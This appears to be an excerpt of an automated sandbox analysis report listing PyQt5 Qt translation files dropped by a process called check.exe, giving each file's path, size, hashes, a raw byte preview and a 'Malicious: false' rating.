                                                                                                                                                                                                                                      Preview:<.d....!..`.......de_DEB..7....*.......+..3....@..R....A..R....B..S....C..S@...D..S....E..T]...F..T....G..T....H..T....I..U#...P..W....Q..W6...R..W....S..W....T..W....U..W....V..XG...W..Xk...X..X....Y..X....]..2%...s..J$...t..9R......J.......B....;..1....;..3....;..q....;.......M..2O...O.......O..X@......ia...}..2y......Q....=..Q....m..2....t..Q...........(5......+;..ev..+;......+O..oh..1....4..D@..R...E@..WZ..H4..4...HY...[..H...AY..IC..>o..J...>...J.......J...>6..LD..@A..L...@...PS..I...QR..#...R....h..T...W...U...Xh..U....~..X...]...Zr..e(..[`..)...\...j...]x..O..._....K.._...lI..yg...U..1...f....E..i....7..........o.......wG......6.......6.......8....$...n...[..8....,..9....y.......y..=................3......>....9.......E..."......?_...z..#d.......0......A%...%..z....D..A.......B......KP......2.............^...5..B....0.......0..p....0..F....0...}...5..G....5..........H........... D..3}.. D...O..+...Q...<?..Ti..<U......<U..T...<...U)..H5..3...H5......L...X...VE..%j..V...l..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qtbase_en.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                      Entropy (8bit):4.0
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                                                      MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                                                      SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                                                      SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                                                      SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`...

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qtbase_es.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):165170
                                                                                                                                                                                                                                      Entropy (8bit):4.679910767547088
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:JVwzuvb+Ta64KQd84arHX5pxiVhA8QlOD/BnFNa8NsvsfFsfcoZtIx6F:JVwSTG4KqVaLX5pEVK7OJFczstgRtIx8
                                                                                                                                                                                                                                      MD5:C7C58A6D683797BFDD3EF676A37E2A40
                                                                                                                                                                                                                                      SHA1:809E580CDBF2FFDA10C77F8BE9BAC081978C102B
                                                                                                                                                                                                                                      SHA-256:4FFDA56BA3BB5414AB0482D1DDE64A6F226E3488F6B7F3F11A150E01F53FA4C8
                                                                                                                                                                                                                                      SHA-512:C5AED1A1AA13B8E794C83739B7FDDEAFD96785655C287993469F39607C8B9B0D2D8D222ECD1C13CF8445E623B195192F64DE373A8FB6FE43743BAF50E153CDA5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......es_ESB../....*..*,...+...y...@.......A.......B.......C.......D...v...E...=...F.......G.......H.......I.......P.......Q... ...R...k...S.......T.......U.......V...1...W...U...X...y...Y.......]..+....s.......t...................c...;..+....;..,....;...%...;..#....;..-....M..+....O.......O...............}..,............=...]...m..,/...t..........A...(5..3...+;..<...+;..o...+O..!b..1...Ap..D@......E@...D..H4...-..HY..[F..H.......IC...%..J....L..J.......J.......LD......L....O..PS......QR..!...R...`K..T.......U....&..X.......Zr.....[`...h..\......]x...|.._....Y.._....A..yg......1...=....E..?a......!.......K........G...............R...$..\Q...[.......,...z...y.......y..................+............9..\....E..2............z.. ....................%..ON...D........................:......=B.....A....5...7...0.......0......0.."....0...,...0..3....5...}...5...Y..............a... D..-!.. D..Z6..+....0..<U...h..<U......<.......H5..-M..H5..Z...L.......VE.."...VE..>...V......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qtbase_fi.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):179941
                                                                                                                                                                                                                                      Entropy (8bit):4.720938209922096
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:lvdTgO2Yl97ZWnbgTLt/Tf9IlqAeiy5uWkYGM0wNCdRjSK2YUlUs:lvdkA9vh5uWkY0MK2YXs
                                                                                                                                                                                                                                      MD5:8472CF0BF6C659177AD45AA9E3A3247C
                                                                                                                                                                                                                                      SHA1:7B5313CDA126BB7863001499FB66FB1B56C255FC
                                                                                                                                                                                                                                      SHA-256:E47FE13713E184D07FA4495DDE0C589B0E8F562E91574A3558A9363443A4FA72
                                                                                                                                                                                                                                      SHA-512:DE36A1F033BD7A4D6475681EDC93CC7B0B5DCB6A7051831F2EE6F397C971B843E1C10B66C4FB2EFF2A23DC07433E80FBF7B95E62C5B93E121AB5AD88354D9CB8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......fiB..38...*..ct...+......@.......A.......B.......C...@...D.......E...]...F.......G.......H.......I...#...P.......Q...6...R.......S.......T.......U.......V...G...W...k...X.......Y.......]..*....s...T...t.......................;..*....;..+....;..&....;..3....M..+!...O.......O...e...........}..+K...........=.......m..+w...t..........J...(5..9...+;..:y..+;..mW..+O..$...1...KY..D@......E@...Z..H4...l..HY..X&..H.......IC......J.......J...."..J......LD.....L.......PS...'..QR.. L..R...]...T.......U.......X.......Zr......[`......\.......]x......_....k.._....>..yg.. /..1...;....E..>....7..{(......%.......J........T.......&.......U...$..Y[...[......,...s...y.......y...a.......}......d...........9..Y....E..k'...........z...........V..........%..M....D...Q.......{......d.....A......E......K....5.......0.......0..&J...0.......0..k....5...*...5..I9.............._:.. D..,O.. D..W...+....9..<U...G..<U...*..<.......H5..,y..H5..W...H5......L....5..VE..!u..VE..E...V..."{..f.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qtbase_fr.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):166167
                                                                                                                                                                                                                                      Entropy (8bit):4.685212271435657
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:CLZ1w8McowCppcPwL5pYFw+G00QsbLckCiWxvq+sjs06oFm:C91wxcowspc4L5pUw+cz39CiQ7tloFm
                                                                                                                                                                                                                                      MD5:1F41FF5D3A781908A481C07B35998729
                                                                                                                                                                                                                                      SHA1:ECF3B3156FFE14569ECDF805CF3BE12F29681261
                                                                                                                                                                                                                                      SHA-256:EDB32A933CEF376A2636634E14E2977CED6284E4AA9A4AC7E2292F9CA54C384A
                                                                                                                                                                                                                                      SHA-512:A492E8AC88095A38A13549C18C68E1F61C7054AB9362C2B04C65B93E48E4A07941C8DA6950BAE79041094623E0ED330CA975110FDE8248B4D9380B9F729AD891
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......fr_FRB../....*..-....+.......@.......A.......B.......C...?...D.......E...\...F.......G.......H.......I..."...P.......Q...5...R.......S.......T.......U.......V...F...W...j...X.......Y.......]..+....s...=...t.......................;..+....;..,....;.......;..$b...;.......M..,....O.......O...5...........}..,3...........=.......m..,]...t..........A...(5..5j..+;..<T..+;..o...+O.."+..1...B\..D@......E@...Y..H4...8..HY..[{..H.......IC......J.......J.......J.......LD...|..L.......PS...?..QR..!...R...`j..T.......U....[..X.......Zr.....[`...)..\......]x......_....7.._.......yg...i..1...=Q...E..?@......"Y......K............................$..\....[...^...,...'...y.......y...+.......o....../c.......Y...9..\....E..6(...........z..!................j...%..OC...D...+.......[......a.....;......>......B....5.......0.......0...m...0..#....0.......0..6....5.......5..................a... D..-Y.. D..Ze..+....]..<U...;..<U......<.......H5..-...H5..Z...L.......VE.."...VE..?...V......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qtbase_gd.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):189580
                                                                                                                                                                                                                                      Entropy (8bit):4.630160941635514
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:SiaI3C87jhakhR0VGkw7ys7CskUH6y4e6IFB4xyMuhvDnJGhFaCo527arBbm07LZ:S2yGjh17yGqxTXhvQoejJd8FUjVgk
                                                                                                                                                                                                                                      MD5:EB1FB93B0BE51C2AD78FC7BA2F8B9F42
                                                                                                                                                                                                                                      SHA1:24F7FF809E2F11C579CD388FEA5A4C552FF8D4D0
                                                                                                                                                                                                                                      SHA-256:63B439DD44139AA3AED54C2EBE03FA9BC77F22C14ED8FBA8EFF2608445BB233D
                                                                                                                                                                                                                                      SHA-512:E13770AEF33B6666ED7D54E03EE20CA291D4167D673BA6C61D8E64CDD5F7FFE0A9521B95AF67BE719BF263932ECF16E2B2D0B5F3404F9BCD7879114FCC6FC474
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......gd_GBB..2....*...u...+......@.......A...B...B.......C.......D.. ....E.. ....F..!&...G..!J...H..!n...I..!....P..#m...Q..#....R..#....S..$....T..$$...U..$H...V..$....W..$....X..$....Y..%....]../....s...'...t...................F...;.......;../....;..=V...;..G....M../G...O.......O...k......$....}../o.......i...=.......m../....t..........[...(5..M...+;..@...+;..x...+O..:...1...\7..D@...f..E@..#...H4...p..HY..be..H.......IC......J.......J....R..J.......LD......L.......PS......QR..#l..R...g...T.......U.......X....\..Zr......[`......\...&...]x......_....C.._...'t..yg..?...1...BM...E..D.......;.......R'.......t.......@.......?...$..c....[......,...i...y.......y...Y.......f.......+...........9..c....E...............z.."....................%..U....D..................G.....UB.....W......\]...5.......0.......0..<....0...;...0.......5.......5..ij..............h... D..0... D..aC..+....K..<U.....<U...~..<.......H5..0...H5..a...L....1..VE..$...VE..X...V...8|..f...Z...f...=..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qtbase_he.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):138690
                                                                                                                                                                                                                                      Entropy (8bit):5.515748942553918
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:XSue8Z7T3iJsqBejt/zNHSLzdetY2ZISfC/S:XSueK3w7Ijt8zUtYAISfC/S
                                                                                                                                                                                                                                      MD5:DEAF87D45EE87794AB2DC821F250A87A
                                                                                                                                                                                                                                      SHA1:DB39C6BAA443AA9BB208043EF7FB7E3403C12D90
                                                                                                                                                                                                                                      SHA-256:E1EBCA16AFE8994356F81CA007FBDB9DDF865842010FE908923D873B687CAD3F
                                                                                                                                                                                                                                      SHA-512:276FCE81249EFFE19E95607C39F9ACB3A4AFA3F90745DA21B737A03FEA956B079BCA958039978223FD03F75AC270EC16E46095D0C6DDA327366C948EC2D05B9C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......he_ILB../....*......+..Sw...@......A......B.......C.......D...X...E.......F.../...G...O...H...o...I......P.......Q.......R...I...S...i...T......U......V.......W.......X.../...Y...O...]..$....s......t..X:.......4......`Y...;..$....;..%....;.......;...5...;.......M..$....O...6...O..s............}..%-...........=...m...m..%k...t..........^..(5......+;..2...+;..^...+O...N..1.......D@......E@...(..H4..T...HY..L...H..._...IC..\...J...\...J.......J...\j..LD..^...L...^o..PS..fl..QR......R...Q...T...su..U...s...X...x3..Zr..~...[`..L\..\.......]x....._......._....o..yg...(..1...3....E..5C.......z......?V......U.......U.......W....$..M....[..W....,..X....y.......y..\........a..............\@...9..NO...E...?......]s...z...G.......(......^....%..B^...D.._......._.................... ..........5..`/...0.......0...L...0......0..d(...0......5..ek...5..........fB......R... D..&O.. D..K...+...l...<U......<U..p)..<...p...H5..&w..H5..La..L...s...VE......VE......V.....

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qtbase_hu.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):160494
                                                                                                                                                                                                                                      Entropy (8bit):4.831791320613137
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:BmOMZadV9n51xXeQvjOiIzz7/Vs9Db3ihuJNvMfWxBNlYzYbTrIkfwb03l24cNKu:HkWa5pg0MahBHDd
                                                                                                                                                                                                                                      MD5:E9D302A698B9272BDA41D6DE1D8313FB
                                                                                                                                                                                                                                      SHA1:BBF35C04177CF290B43F7D2533BE44A15D929D02
                                                                                                                                                                                                                                      SHA-256:C61B67BB9D1E84F0AB0792B6518FE055414A68E44D0C7BC7C862773800FA8299
                                                                                                                                                                                                                                      SHA-512:12947B306874CF93ABA64BB46FAC48179C2D055E770D41AF32E50FFFB9F0C092F583AFCEA8B53FE9E238EF9370E9FFFBEB581270DFA1A7CB74EBE54D9BFF459F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......hu_HUB../....*.......+.......@.......A...0...B...{...C.......D.......E.......F.......G...<...H...`...I.......P...s...Q.......R.......S.......T...*...U...N...V.......W.......X.......Y.......]..+y...s.......t.......................;..+Q...;..,U...;.......;.......;..&....M..+....O.......O...U..........}..+............=.......m..+....t..........9c..(5..,...+;..;...+;..m7..+O......1...9...D@...T..E@......H4...v..HY..Y...H.......IC......J.......J.......J.......LD......L.......PS...}..QR..!...R...]...T.......U....{..X.......Zr...=..[`......\....*..]x...-.._......._......yg...M..1...<....E..>...............J........T.......(.......S...$..Z....[.......,...u...y.......y...[...............#...........9..Z....E..#&...........z..!'...................%..Mv...D..._....................32.....5......9....5.......0...h...0...E...0.......0.......0..#....5...Z...5...........G......_2.. D..,... D..W...+....W..<U......<U...B..<.......H5..,...H5..X{..L....)..VE.."...VE..6l..V....*.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qtbase_it.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):161172
                                                                                                                                                                                                                                      Entropy (8bit):4.680034416311688
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:eSfxfdO4BKJb0td5pqCOIUP/PFIM7gxGQ9sRrFM6QJ4m8ihkM:eSfxFO4BKJb0td5pnOrvCqg9mRK4IkM
                                                                                                                                                                                                                                      MD5:88D040696DE3D068F91E0BF000A9EC3E
                                                                                                                                                                                                                                      SHA1:F978B265E50D14FDDE9693EC96E99B636997B74D
                                                                                                                                                                                                                                      SHA-256:7C7DC8B45BF4E41FEC60021AB13D9C7655BE007B8123DB8D7537A119EB64A366
                                                                                                                                                                                                                                      SHA-512:F042637B61C49C91043D73B113545C383BD8D9766FD4ACC21675B4FF727652D50863E72EA811553CB26DF689F692530184A6CE8FE71F9250B5A55662AFE7D923
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......it_ITB../....*.......+.......@.......A..."...B...m...C.......D.......E.......F.......G...0...H...T...I...x...P...q...Q.......R.......S.......T...(...U...L...V.......W.......X.......Y.......]..+....s...'...t...................^...;..+[...;..,g...;.......;.......;..!B...M..+....O...D...O...........(...}..+........I...=.......m..,....t..........4...(5..'...+;..<...+;..oV..+O......1...5...D@...F..E@......H4...J..HY..Z...H.......IC...L..J....s..J....j..J.......LD......L....f..PS......QR..!...R..._...T.......U....3..X.......Zr......[`...Q..\.......]x......_......._....0..yg...C..1...=....E..?o..............Kf.......h.......8.......I...$..[....[.......,...m...y...9...y...........z.......z...........9..\=...E..$u.......:...z.. k...................%..N....D..................M............0......5/...5...2...0.......0...0...0...A...0...)...0..$....5.......5...J.......a......a... D..,... D..Y...+.......<U......<U......<....v..H5..-...H5..Z...L.......VE.."c..VE..1...V....X.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qtbase_ja.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):129911
                                                                                                                                                                                                                                      Entropy (8bit):5.802855391832282
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:W8YYSCjKBJ26c1Z7f25pVmuLXpxfqt7FEUWNrfQje9kWI23pKXvx:xYuKBJ01Z7u5pQuLbESUWNzAAI23pKfx
                                                                                                                                                                                                                                      MD5:608B80932119D86503CDDCB1CA7F98BA
                                                                                                                                                                                                                                      SHA1:7F440399ABA23120F40F6F4FCAE966D621A1CC67
                                                                                                                                                                                                                                      SHA-256:CBA382ACC44D3680D400F2C625DE93D0C4BD72A90102769EDFD1FE91CB9B617B
                                                                                                                                                                                                                                      SHA-512:424618011A7C06748AADFC2295109D2D916289C81B01C669DA4991499B207B781604A03259C546739A3A6CF2F8F6DFA753B23406B2E2812F5407AEE343B5CBDD
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......jaB../....*...'...+..=....@.......A.......B...?...C...c...D......E......F.......G.......H..."...I...F...P.......Q...'...R...r...S......T......U.......V...8...W...\...X......Y......].."k...s...Q...t..A...............I....;.."C...;..#A...;.......;.......;.......M.."....O...B...O..[?......h....}.."........m...=.......m.."....t...........M..(5......+;......+;..WU..+O......1.......D@......E@...K..H4..>=..HY..F...H...Hr..IC..E...J...F...J.......J...E...LD..Gz..L...G...PS..O...QR......R...K!..T...Z...U...[e..X..._f..Zr..e...[`..7...\...i...]x...'.._......._...j...yg..~+..1.../....E..1?.......#......:.......?.......?n......A....$..G....[..Ap...,..B....y.......y..Ew......|...............E....9..H....E..........F....z...]..............HL...%..=R...D..H.......I!......[......J......M..........5..It...0...3...0.......0...C...0..M....0...a...5..N....5..........N.......L6.. D..#... D..E...+...U%..<U......<U..X ..<...X...H5..#...H5..FK..L...[...VE......VE......V......f.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qtbase_ko.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):156799
                                                                                                                                                                                                                                      Entropy (8bit):5.859529082176036
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:rvTy18hhPekHs1iNXVExWbStnn8TExgkYOvYejZOvXx4Mmf0MwUL8smk/pDZyy:y18hJ61nMStnn8TOgknQRLWZmkxNyy
                                                                                                                                                                                                                                      MD5:082E361CBAC2E3A0849F87B76EF6E121
                                                                                                                                                                                                                                      SHA1:F10E882762DCD2E60041BDD6CC57598FC3DF4343
                                                                                                                                                                                                                                      SHA-256:0179ED1B136E1CB3F583351EAA2C545BA3D83A6EE3F82C32505926A1A5F5F183
                                                                                                                                                                                                                                      SHA-512:F378A42116924E30FA0B8FFF1D3C3CB185DC35B2746DCE2818BE7C2AA95C5DE103DF44AAC74DA969C36C557F1D4DE42AC7647EC41066247F8AD2697BDED667EA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......koB..7....*.......+.......@...K...A...o...B......C.......D...8...E.......F...U...G...y...H......I.......P......Q.......R.......S...C...T...g...U.......V.......W.......X...-...Y...Q...]..$....s...>...t...................y...;..${...;..%....;...u...;...l...M..$....O.......O...8...........}..$............=...C...m..%!...t...n..........(5...a..+;..E@..+;..l|..+O......1.......D@.....E@......H4......HY..\...H....]..IC......J.......J....8..J.......LD...a..L.......PS......QR......R...`...T.......U....^..U.......X....y..Zr......[`..y...\....A..]x......_......._....o..yg......1...FJ...E..HE...7..................Q........a.......5...........$..]....[...;...,.......y.......y...V...............!.......|...9..]....E...R...........z...4.......f.......5...%..Te...D..................D......^.............*...5...S...0.......0.......0.......0.......5.......5...........n......a... D..%... D..[...+.......<?......<U...;..<U...+..<.......H5..&...H5..\...L.......VE......V....A..f.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qtbase_lv.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153608
                                                                                                                                                                                                                                      Entropy (8bit):4.843805801051326
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:y5pmbKIhooMbGe91MrjOhmGzP6LJbWz5XIxELpU6:yObeqrjPGzeJyJLy6
                                                                                                                                                                                                                                      MD5:BD8BDC7BBDB7A80C56DCB61B1108961D
                                                                                                                                                                                                                                      SHA1:9538C4D8BB9A95C0D9DC57C7708A99DD53A32D1F
                                                                                                                                                                                                                                      SHA-256:846E047573AE40C83671C3BA7F73E27EFC24B98C82701DA0DF9973E574178BB2
                                                                                                                                                                                                                                      SHA-512:F040EC410EBFEA21145F944E71ADCAE8E5F60907D1D3716A937A9A59A48F70C6B7EAAC91C2C554F59357A7BC820CDBD17C73A4DECC20B51F68EB79EDD35C5554
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......lv_LVB.......*...B...+..y....@.......A...=...B......C......D.......E.......F...#...G...G...H...k...I.......P...~...Q......R.......S.......T...5...U...Y...V......W.......X.......Y.......]..%....s.......t...8.......n.......A...;..&....;.......;...!...;...A...;../....M..%....O.......O...............}..%...........=.......m..&....t...(......(g..(5...+..+;..4...+;..d...+O......1...(...D@...a..E@......H4..z...HY..Q...H.......IC......J....6..J.......J.......LD......L....9..PS......QR......R...U...T....S..U.......X...._..Zr......[`..r...\.......]x...*.._......._....{..yg......1...5v...E..7........(......B.......|.......|W......~r...$..R....[..~....,.......y...l...y...............................9..S....E...g...........z...z...................%..F....D........................"Z.....$......)....5.......0...\...0.......0...r...0.......0.......5...a...5..........J......V... D..&... D..P...+.......<U......<U......<.......H5..'"..H5..P...L....~..VE...R..VE..%...V......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qtbase_pl.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):162982
                                                                                                                                                                                                                                      Entropy (8bit):4.841899887077422
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:sXpestp/YIFtDT8FIWYbIJmPYuIpnmxAk6mwyJNqSm9+P:sxpTDT8FIWfJmdCmxApmbnqSm9+P
                                                                                                                                                                                                                                      MD5:F9475A909A0BAF4B6B7A1937D58293C3
                                                                                                                                                                                                                                      SHA1:76B97225A11DD1F77CAC6EF144812F91BD8734BD
                                                                                                                                                                                                                                      SHA-256:CE99032A3B0BF8ABAD758895CC22837088EAD99FD2D2514E2D180693081CFE57
                                                                                                                                                                                                                                      SHA-512:8A4F1B802B6B81FF25C44251FB4A880E93E9A5FE25E36825A24BFE0EFB34E764E7E1EE585D3A56554964B7921E7813C67F12D200D6E0C5EAF4BB76B064B5C890
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......pl_PLB..0....*.."....+.......@...F...A...j...B......C.......D...3...E.......F...P...G...t...H.......I.......P.......Q.......R.......S...>...T...b...U.......V.......W.......X...(...Y...L...]..*....s.......t...r.......o.......+...;..*....;..+....;..."...;... ...M..*....O...6...O...........a...}..+...........=.......m..+G...t...G......,...(5......+;..:...+;..k...+O......1...-[..D@.....E@......H4...U..HY..WU..H.......IC......J....6..J.......J.......LD......L....%..PS......QR.. ...R...[...T....1..U.......X......Zr......[`......\.......]x...A.._......._....}..yg......1...;W...E..=........%......H....................$..Xp...[.......,.......y...i...y...........}......$R...........9..X....E..+)...........z.. E...................%..K....D...p....................&......(......-....5.......0.......0...e...0.......0..+....5...]...5...........f......]-.. D..,%.. D..V?..+....V..<U......<U......<....-..H5..,M..H5..V...L....Z..VE..!...VE..)...V.......f...P...f....K..f......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qtbase_ru.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):203767
                                                                                                                                                                                                                                      Entropy (8bit):5.362551648909705
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:hn4dEJ63pdhPpy6gu5fs4MHQv6sLlxnrncF423ZL9xyuXwdcX8LZuf76CW+WeXFx:aN3pdV5fZbpItXsttRY+WSq
                                                                                                                                                                                                                                      MD5:5096AD2743BF89A334FBA6A2964300D4
                                                                                                                                                                                                                                      SHA1:405F45361A537C7923C240D51B0FF1C46621C203
                                                                                                                                                                                                                                      SHA-256:3DA6605668F9178D11A838C4515478084DCFB4F9CF22F99D7A92B492DB9C224B
                                                                                                                                                                                                                                      SHA-512:7B88B501792B5831426BAA669138192ED94CC3F8323A3DF9D5287655DC4D877706908C517AB7523AE8A283BF50B47123F13B8AE40EA2F3081C3459EDC47FC8DD
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ru_RUB..7....*...L...+...W...@..,....A..,....B..-1...C..-U...D..-....E...r...F.......G.......H../....I../8...P..1'...Q..1K...R..1....S..1....T..1....U..2....V..2\...W..2....X..2....Y..2....].......s..$c...t...'......%........r...;..-....;.......;..J....;..V....M...C...O.......O..&.......8....}...m......+3...=..+....m.......t..+.......p...(5..]@..+;..[0..+;......+O..H...1...qM..D@..-...E@..1o..H4...p..HY..xm..H....*..IC...@..J....g..J.......J.......LD......L....p..PS......QR..!...R...}...T...&...U...'...U...ki..X...+...Zr..3...[`......\...:...]x..)..._......._...;...yg..S...1...\....E..__...7.........H.......k................j.......U...$..y....[.......,.......y...k...y...............................9..y....E...O...........z..!*...................%..nW...D.................%w.....g......j~.....qw...5...H...0.......0..I....0..._...0......5.......5..................~... D../k.. D..wa..+....?..<?.."t..<U......<U.."...<...#z..H5../...H5..w...L...&...VE.."...V...F$.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qtbase_sk.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
